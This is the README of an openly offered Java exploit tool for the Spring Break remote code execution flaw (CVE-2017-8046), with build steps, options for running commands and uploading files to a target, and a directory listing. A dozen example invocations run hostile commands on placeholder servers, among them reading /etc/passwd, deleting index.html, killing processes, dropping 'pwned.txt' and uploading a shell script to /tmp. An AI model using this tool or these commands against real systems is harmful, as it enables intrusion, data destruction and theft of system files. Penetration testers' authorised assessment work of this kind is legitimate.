This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046).
# spring-break_cve-2017-8046
This is a Java program that exploits **Spring Break** vulnerability (**CVE-2017-8046**).
This software is written to have as less external dependencies as possible.
**This tool is intended for security engineers and appsec guys for security assessments. Please use this tool responsibly. I do not take responsibility for the way in which any one uses this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.**
## Vulnerability info
* **CVE-ID**: CVE-2017-8046
* **Link**: [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046)
* **Description**: Malicious *PATCH* requests submitted to *spring-data-rest* servers in **Pivotal Spring Data REST** versions prior to **2.5.12**, **2.6.7**, **3.0 RC3**, **Spring Boot** versions prior to **2.0.0M4**, and **Spring Data** release trains prior to **Kay-RC3** can use specially crafted JSON data to run arbitrary Java code.
* **Vendor link**: [https://pivotal.io/security/cve-2017-8046](https://pivotal.io/security/cve-2017-8046)
## How to generate an executable JAR
Here some steps to follow in order to generate an executable JAR, with all dependencies into it, that can be used to launch the exploit.
### with Maven
Following Maven command can be launched:
mvn clean compile package
### with Eclipse
Following steps can be done:
1. solve all external dependencies/libraries;
1. right click on the Eclipse project and go to `Run As > Run Configurations`;
1. right click on `Java Application` then on `New`;
1. choose a name and set the main class to `com.afs.exploit.spring.SpringBreakCve20178046`;
1. click on `Apply` button;
1. close the window and go back to the main Eclipse window;
1. right click on the Eclipse project and click on `Export...`;
1. find and choose `Runnable JAR file` (under `Java` branch);
1. in the following window:
1. choose the correct `Launch configuration` created before;
1. choose an `Export destination`;
1. choose the option `Extract required libraries into generated JAR`;
1. click on `Finish` button.
## Help
java -jar spring-break_cve-2017-8046.jar [options]
Exploiting 'Spring Break' Remote Code Execution (CVE-2017-8046).
-h, --help
Prints this help and exits.
-u, --url [target_URL]
The target URL where the exploit will be performed.
You have to choose an existent resource.
-cmd, --command [command_to_execute]
The command that will be executed on the remote machine.
-U, --upload [file_to_upload]
File to upload to the remote machine. Will be uploaded to the current working
directory of the java process. Warning: this will only succeed on a server running
JRE-1.7 or later.
--remote-upload-directory [/some/existing/path/]
Optional. Server will attempt to write the uploaded file to this directory on the
filesystem. Specified directory must exist and be writeable.
--cookies [cookies]
Optional. Cookies passed into the request, e.g. authentication cookies.
-H, --header [custom_header]
Optional. Custom header passed into the request, e.g. authorization header.
Skip SSL validation
Optional. Removes error messages in output due to the usage of the
exploit. It could hide error messages if the request fails for other reasons.
Optional. In case of errors the command will fail and the error stream will
not be returned. This option can be used to relaunch the remote command
returning the error stream.
-v, --verbose
Optional. Increase verbosity.
## Examples
java -jar spring-break_cve-2017-8046.jar --url "https://vuln01.foo.com/api/v1/entity/123" --command ipconfig
java -jar spring-break_cve-2017-8046.jar --url "https://vuln02.foo.com/api/v2/entity/42" --command ipconfig --cookies "JSESSIONID=qwerty0123456789"
java -jar spring-break_cve-2017-8046.jar -v --url "https://vuln02.foo.com/api/v2/entity/42" --upload file.sh --remote-upload-directory /tmp
java -jar spring-break_cve-2017-8046.jar --url "https://vuln03.foo.com/asd/api/v1/entity/1" --command dir --cookies "JSESSIONID=qwerty0123456789;foo=bar"
java -jar spring-break_cve-2017-8046.jar --url "https://vuln04.foo.com/asd/api/v1/entity/1" --command "dir C:\Windows" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln05.foo.com/asd/api/v1/entity/1" --command "copy /b NUL ..\..\pwned.txt" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln06.foo.com/asd/api/v1/entity/1" --command "ping -c 3 www.google.it" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln07.foo.com/asd/api/v1/entity/1" --command "ps aux" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln08.foo.com/asd/api/v1/entity/1" --command "uname -a" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln09.foo.com/asd/api/v1/entity/1" --command "ls -l" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln10.foo.com/asd/api/v1/entity/1" --command "wget https://www.google.com" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln11.foo.com/asd/api/v1/entity/1" --command "rm index.html" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln12.foo.com/asd/api/v1/entity/1" --command "cat /etc/passwd" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln13.foo.com/asd/api/v1/entity/1" --command "kill -9 5638" --clean
Please note that the referenced resource/URL must exist!
## Vulnerable application
A vulnerable application can be found [here](https://github.com/m3ssap0/SpringBreakVulnerableApp).
## Authors
* **Antonio Francesco Sardella** - *main implementation* - [m3ssap0](https://github.com/m3ssap0)
* **Yassine Tioual** - *HTTP header enhancement* - [nisay759](https://github.com/nisay759)
* **Robin Wagenaar** - *for the suggestion to use patch operation 'remove' instead of 'replace' and for the file upload functionality* - [RobinWagenaar](https://github.com/RobinWagenaar)
## License
This project is licensed under the Apache License Version 2.0 - see the **LICENSE.txt** file for details.
## Acknowledgments
* [Man Yue Mo](https://lgtm.com/blog/spring_data_rest_CVE-2017-8046_ql) the security researcher who discovered the vulnerability
[4.0K] /data/pocs/ded79cac996377b67df0ee4e024f3eeaf3c3fad6
├── [ 566] LICENSE.txt
├── [2.5K] pom.xml
├── [6.4K] README.md
└── [4.0K] src
└── [4.0K] main
└── [4.0K] java
└── [4.0K] com
└── [4.0K] afs
└── [4.0K] exploit
└── [4.0K] spring
└── [ 24K] SpringBreakCve20178046.java
7 directories, 4 files
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